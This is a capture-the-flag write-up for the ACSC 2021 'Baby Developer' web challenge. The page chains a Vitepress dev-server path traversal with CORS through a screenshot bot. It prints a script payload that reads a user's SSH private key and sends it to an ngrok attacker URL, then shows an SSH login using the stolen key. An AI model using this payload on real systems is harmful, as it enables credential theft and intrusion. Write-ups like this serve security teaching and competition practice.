πŸ‘¨πŸ’»
πŸ‘¨πŸ’»
πŸ‘¨πŸ’»
πŸ‘¨πŸ’»
CTFs
HomePentestingLearn
Search…
🚩
Zeyu's CTF Writeups
Home
Pentesting
My Vulnerable Website
My Challenges
SEETF 2022
Cyber League Major 1
STANDCON CTF 2021
2022
BSidesTLV 2022 CTF
Grey Cat The Flag 2022
DEF CON CTF 2022 Qualifiers
Securinets CTF Finals 2022
NahamCon CTF 2022
Securinets CTF Quals 2022
CTF.SG CTF
YaCTF 2022
DiceCTF 2022
TetCTF 2022
2021
hxp CTF 2021
HTX Investigator's Challenge 2021
Metasploit Community CTF
MetaCTF CyberGames
CyberSecurityRumble CTF
The InfoSecurity Challenge (TISC) 2021
SPbCTF's Student CTF Quals
Asian Cyber Security Challenge (ACSC) 2021
Cowsay As A Service
Favorite Emojis
Baby Developer
API
RSA Stream
Filtered
NYONG Coin
CSAW CTF Qualification Round 2021
YauzaCTF 2021
InCTF 2021
UIUCTF 2021
Google CTF 2021
TyphoonCon CTF 2021
DSTA BrainHack CDDC21
BCACTF 2.0
Zh3ro CTF V2
Pwn2Win CTF 2021
NorzhCTF 2021
DawgCTF 2021
UMDCTF 2021
Midnight Sun CTF 2021
picoCTF 2021
DSO-NUS CTF 2021
Powered By GitBook
Baby Developer
Directory traversal in insecure Vitepress development server leads to information disclosure through SSRF

Description

I made a mobile (apple watch miniminimini series 1337) viewer on my personal server.
  • http://baby-developer.chal.acsc.asia:8888/
  • ssh baby-developer.chal.acsc.asia -p2222

Solution

  • There is a genflag server which you are supposed to SSRF
  • However, the remote address and user agent are checked so you can't do it directly from mobile-viewer
  • The pages are rendered as screenshots
1
@app.route('/flag')
2
def hello_world():
3
if request.remote_addr == dev and 'iPhone' not in request.headers.get('User-Agent'):
4
fp = open('/flag', 'r')
5
flag = fp.read()
6
return flag
7
else:
8
return "Nope.."
Copied!
From mobile-viewer, we need to request http://genflag/flag from website. This can be done from /home/stypr/readflag on website.
1
# Challenge: get flag!
2
RUN touch /home/stypr/.hushlogin && \
3
echo '#include <stdio.h>\r\n#include <stdlib.h>\r\nint main(){FILE *fp;char flag[1035];fp = popen("/usr/bin/curl -s http://genflag/flag", "r");if (fp == NULL) {printf("Error found. Please contact administrator.");exit(1);}while (fgets(flag, sizeof(flag), fp) != NULL) {printf("%s", flag);}pclose(fp);return 0;}' > /home/stypr/readflag.c && \
4
gcc -o /home/stypr/readflag /home/stypr/readflag.c && \
5
chmod +x /home/stypr/readflag && rm -rf /home/stypr/readflag.c
Copied!
Refer to the website source. The website server runs yarn dev, which runs vitepress dev src.
Vitepress is run on dev mode. I found that this enables CORS, allowing us to perform a CSRF to exfiltrate data. Furthermore, I found that there was a path traversal vulnerability, allowing us to get the SSH key: http://website/../../../../../home/stypr/.ssh/id_rsa
From mobile-viewer, we can make a request to our attacker site, which contains:
1
<script>
2
fetch("http://website/../../../../../home/stypr/.ssh/id_rsa")
3
.then(resp => resp.text())
4
.then(data => fetch('http://0db7-115-66-195-39.ngrok.io/?' + btoa(data)))
5
</script>
Copied!
Get the private key and SSH into the server to get the flag:
1
$ ssh [email protected] -p2222 -i id_rsa
2
ACSC{weird_bugs_pwned_my_system_too_late_to_get_my_CVE}
Copied!
Previous
Favorite Emojis
Next
API
Last modified 1mo ago
Copy link
Contents
Description
Solution